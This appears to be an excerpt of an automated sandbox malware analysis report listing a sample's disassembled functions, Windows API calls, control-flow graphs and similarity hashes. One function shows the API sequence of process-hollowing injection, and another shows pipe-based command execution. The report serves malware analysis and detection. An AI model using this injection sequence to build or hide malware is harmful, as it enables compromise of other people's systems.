                                                                                                                                                                                                                                                    Function 00E0866C Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 32 e0866c-e08694 33 e08696-e08698 32->33 34 e0869a-e0869c 32->34 35 e086eb-e086ee 33->35 36 e086a2-e086a9 call e085a5 34->36 37 e0869e-e086a0 34->37 39 e086ae-e086b2 36->39 37->35 40 e086d1-e086e8 39->40 41 e086b4-e086c2 GetProcAddress 39->41 42 e086ea 40->42 41->40 43 e086c4-e086cf call dfdc10 41->43 42->35 43->42
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: abfd5ce583f3d770d12ba5409826503324e6c9fcd01702a1330ced49166090b5
                                                                                                                                                                                                                                                    • Instruction ID: a42faa72f3d47b9ad6c9bd432996d20b11f5bd8efb137b634630cfbd53ab41ee
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: abfd5ce583f3d770d12ba5409826503324e6c9fcd01702a1330ced49166090b5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3501F533600225AFDB158E6AFE5095A37D6ABC53707169120F984FB1C8DF31D8819750

                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                    Function 00DD8070 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 121memoryprocessthreadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00DD809D
                                                                                                                                                                                                                                                    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00DD80FB
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00DD8114
                                                                                                                                                                                                                                                    • GetThreadContext.KERNEL32(?,00000000), ref: 00DD8129
                                                                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 00DD8149
                                                                                                                                                                                                                                                    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00DD818B
                                                                                                                                                                                                                                                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 00DD81A8
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00DD8261
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
                                                                                                                                                                                                                                                    • String ID: $VUUU$invalid stoi argument
                                                                                                                                                                                                                                                    • API String ID: 3796053839-3954507777
                                                                                                                                                                                                                                                    • Opcode ID: 7bf6606145fb22baaafb0d6334d94e25ed2103eb8677c36e4bdfeddd725d46dd
                                                                                                                                                                                                                                                    • Instruction ID: fb1d3aa905644beaa48e16809daf3ff06f4052177a7bcdbfe7bcc6272dc8d83b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bf6606145fb22baaafb0d6334d94e25ed2103eb8677c36e4bdfeddd725d46dd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC418170644301BFD3219F61DC06FA67BE8FF98B05F004459F744E6290DBB0A959CBAA
                                                                                                                                                                                                                                                    Function 00E129A7 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 183COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00E06CF0: GetLastError.KERNEL32(?,?,?,00DFE157,?,?,?,?,00DFEFF2,?), ref: 00E06CF5
                                                                                                                                                                                                                                                      • Part of subcall function 00E06CF0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00DFE157,?,?,?,?,00DFEFF2,?), ref: 00E06D93
                                                                                                                                                                                                                                                      • Part of subcall function 00E06CF0: _free.LIBCMT ref: 00E06D52
                                                                                                                                                                                                                                                      • Part of subcall function 00E06CF0: _free.LIBCMT ref: 00E06D88
                                                                                                                                                                                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00E12AB3
                                                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 00E12AFC
                                                                                                                                                                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 00E12B0B
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00E12B53
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00E12B72
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                                                                                                                                                                    • String ID: a
                                                                                                                                                                                                                                                    • API String ID: 949163717-2632326712
                                                                                                                                                                                                                                                    • Opcode ID: 8dfecbdbb80df1439c58fde655be26bf153793c8de184ce9b6743a6f746ecc37
                                                                                                                                                                                                                                                    • Instruction ID: 7d7a594fbbb3b7928b499c2f4e957b5685e132c17a38ad1a79aebb60e276c3bf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8dfecbdbb80df1439c58fde655be26bf153793c8de184ce9b6743a6f746ecc37
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86518F71A0020AAFDB20DFA5CC45AFA77B8FF08704F08546DEA55F7191E7709AA48B61
                                                                                                                                                                                                                                                    Function 00E127D2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,2000000B,00E12AF0,00000002,00000000,?,?,?,00E12AF0,?,00000000), ref: 00E1286B
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,20001004,00E12AF0,00000002,00000000,?,?,?,00E12AF0,?,00000000), ref: 00E12894
                                                                                                                                                                                                                                                    • GetACP.KERNEL32(?,?,00E12AF0,?,00000000), ref: 00E128A9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                    • Opcode ID: fac72940f670a2d3b423ef4e16bae31a61255e4134fd15a3db89eab5edb6496b
                                                                                                                                                                                                                                                    • Instruction ID: 53265f5f23df0d86bdc4edc1494eba7e1b2c576bcfe2df949193929ec43462dc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fac72940f670a2d3b423ef4e16bae31a61255e4134fd15a3db89eab5edb6496b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE21A172A00101AADB3C8F65CD01BD773A6AB60B58B56906CEB0AF7254E732DDE1D350
                                                                                                                                                                                                                                                    Function 00DFA3C5 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00DFA3D1
                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00DFA49D
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00DFA4BD
                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00DFA4C7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 254469556-0
                                                                                                                                                                                                                                                    • Opcode ID: ed7b1610d09e029ae510cf1ca06f4dadbaa9b873de823f835dc51a62d3948e78
                                                                                                                                                                                                                                                    • Instruction ID: 7560cbb8efce41a9cb6477d747cb39a65ffa1025a8f0be27af1e7cef7c2c5cb4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed7b1610d09e029ae510cf1ca06f4dadbaa9b873de823f835dc51a62d3948e78
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C3108B5D0521CDBDB20DFA4D9897DDBBB8EF08300F10819AE50DAB250EB709B899F55
                                                                                                                                                                                                                                                    Function 00DF930D Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 140 df930d-df95c6 GetModuleHandleW GetProcAddress * 40
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00DF9313
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00DF9321
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00DF9332
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00DF9343
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00DF9354
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00DF9365
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00DF9376
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00DF9387
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00DF9398
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00DF93A9
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00DF93BA
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00DF93CB
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00DF93DC
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00DF93ED
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00DF93FE
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00DF940F
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00DF9420
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00DF9431
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00DF9442
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00DF9453
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00DF9464
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00DF9475
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00DF9486
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00DF9497
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00DF94A8
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00DF94B9
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00DF94CA
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 00DF94DB
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00DF94EC
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00DF94FD
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00DF950E
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00DF951F
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00DF9530
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00DF9541
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00DF9552
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00DF9563
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00DF9574
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00DF9585
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00DF9596
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00DF95A7
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00DF95B8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                    • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                                                                                                                                                                                                    • API String ID: 667068680-295688737
                                                                                                                                                                                                                                                    • Opcode ID: 71e7ba9543ae270bc8fa712ef96f1e9fd63030102cfa6de1e396dbd9f18b0fa0
                                                                                                                                                                                                                                                    • Instruction ID: 8f87f0409dfab8a87b1bce0f6ebfe9a4d430d1b338059d5bbb3619adc9984c68
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 71e7ba9543ae270bc8fa712ef96f1e9fd63030102cfa6de1e396dbd9f18b0fa0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66618772995378BFCB106FB3BD0DD563EA8BB29742319165EF201F2164DBF842898B50
                                                                                                                                                                                                                                                    Function 00DD8280 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 257pipeprocessfileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000080,?), ref: 00DD832D
                                                                                                                                                                                                                                                    • CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000), ref: 00DD8403
                                                                                                                                                                                                                                                    • SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 00DD8415
                                                                                                                                                                                                                                                    • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00DD8459
                                                                                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00000044,?), ref: 00DD8481
                                                                                                                                                                                                                                                    • Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 00DD848F
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064), ref: 00DD84B8
                                                                                                                                                                                                                                                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DD84DA
                                                                                                                                                                                                                                                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DD84FE
                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,0000007F,00000000,00000000), ref: 00DD8525
                                                                                                                                                                                                                                                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DD856A
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00DD8581
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00DD8589
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00DD8591
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00DD8599
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00DD85A3
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Handle$ClosePipeWow64$NamedPeek$CreateRedirection$DisableErrorFileInformationLastObjectPathProcessReadRevertSingleTempWait
                                                                                                                                                                                                                                                    • String ID: D
                                                                                                                                                                                                                                                    • API String ID: 3215130363-2746444292
                                                                                                                                                                                                                                                    • Opcode ID: 1d0a40053743eff16799dceb7e27038bbd631ccda9aed5579049d3fdcbb97c0f
                                                                                                                                                                                                                                                    • Instruction ID: 67bed7a5395ee5f53e87aee7ced615120cb29062cda77ecb6e342fd9af8ab310
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d0a40053743eff16799dceb7e27038bbd631ccda9aed5579049d3fdcbb97c0f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AAA16E7194021CAFEB21DB64DC45FEDB7B9EB04700F1441D6EA09B6290DB75AB85CFA0
                                                                                                                                                                                                                                                    Function 00E02983 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 357COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 639 e02983-e029b9 640 e02d96-e02d9e 639->640 641 e029bf-e029c7 639->641 642 e02da0 640->642 643 e02da3-e02dcb 640->643 644 e029e5-e029e7 641->644 645 e029c9-e029df call e0c0a3 641->645 642->643 646 e02dd2-e02de0 call df98e0 643->646 648 e029e9 call e0a6b0 644->648 645->644 653 e02d65-e02d88 call e080d6 * 4 645->653 651 e029ee-e029fe call e080d6 648->651 657 e029ff call e0a6b0 651->657 671 e02d89-e02d94 call e080d6 653->671 659 e02a04-e02a0f call e080d6 657->659 665 e02a10 call e0a6b0 659->665 667 e02a15-e02a22 call e080d6 665->667 674 e02a27 call e0a6b0 667->674 671->646 676 e02a2c-e02a37 call e080d6 674->676 679 e02a3c call e0a6b0 676->679 680 e02a41-e02a50 call e080d6 679->680 680->653 683 e02a56-e02a59 680->683 683->653 684 e02a5f-e02a64 683->684 684->653 685 e02a6a-e02a6c 684->685 685->653 686 e02a72-e02a75 685->686 686->653 687 e02a7b 686->687 688 e02a7d-e02a86 687->688 688->688 689 e02a88-e02a97 GetCPInfo 688->689 689->653 690 e02a9d-e02aa3 689->690 690->653 691 e02aa9-e02ab2 690->691 692 e02ab4-e02abb 691->692 693 e02b08-e02b38 call e0c540 691->693 695 e02ad5-e02adb 692->695 696 e02abd-e02ad3 call dfb570 692->696 693->653 700 e02b3e-e02b6b call e0c540 693->700 695->693 699 e02add 695->699 696->693 702 e02ae0-e02ae5 699->702 700->653 709 e02b71-e02b96 call e0c253 700->709 703 e02b05 702->703 704 e02ae7-e02aef 702->704 703->693 706 e02af1-e02afc 704->706 707 e02afe-e02b03 704->707 706->706 706->707 707->702 707->703 709->653 712 e02b9c-e02bd3 709->712 713 e02ca3-e02ce3 712->713 714 e02bd9-e02be0 712->714 715 e02ce5-e02cec 713->715 716 e02d2e-e02d63 713->716 717 e02be2-e02c00 714->717 718 e02c39-e02c3f 714->718 715->716 721 e02cee-e02d2b call e080d6 * 4 715->721 716->671 719 e02c03-e02c35 717->719 718->713 720 e02c41 718->720 719->719 722 e02c37 719->722 723 e02c44-e02c49 720->723 721->716 725 e02ca1 722->725 723->725 726 e02c4b-e02c56 723->726 725->713 729 e02c58-e02c74 726->729 730 e02c99-e02c9f 726->730 732 e02c76-e02c8e 729->732 730->723 730->725 732->732 734 e02c90-e02c96 732->734 734->730
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$Info
                                                                                                                                                                                                                                                    • String ID: P=
                                                                                                                                                                                                                                                    • API String ID: 2509303402-2286154353
                                                                                                                                                                                                                                                    • Opcode ID: 7efcb25c7b58398131fd04c9dac26a66808536d741612c90d36092896c164664
                                                                                                                                                                                                                                                    • Instruction ID: 727d1f08b5f4f5c59469e70f4ed4ebcad8c54faa400eb4fbaebf3cef4ee7be4c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7efcb25c7b58398131fd04c9dac26a66808536d741612c90d36092896c164664
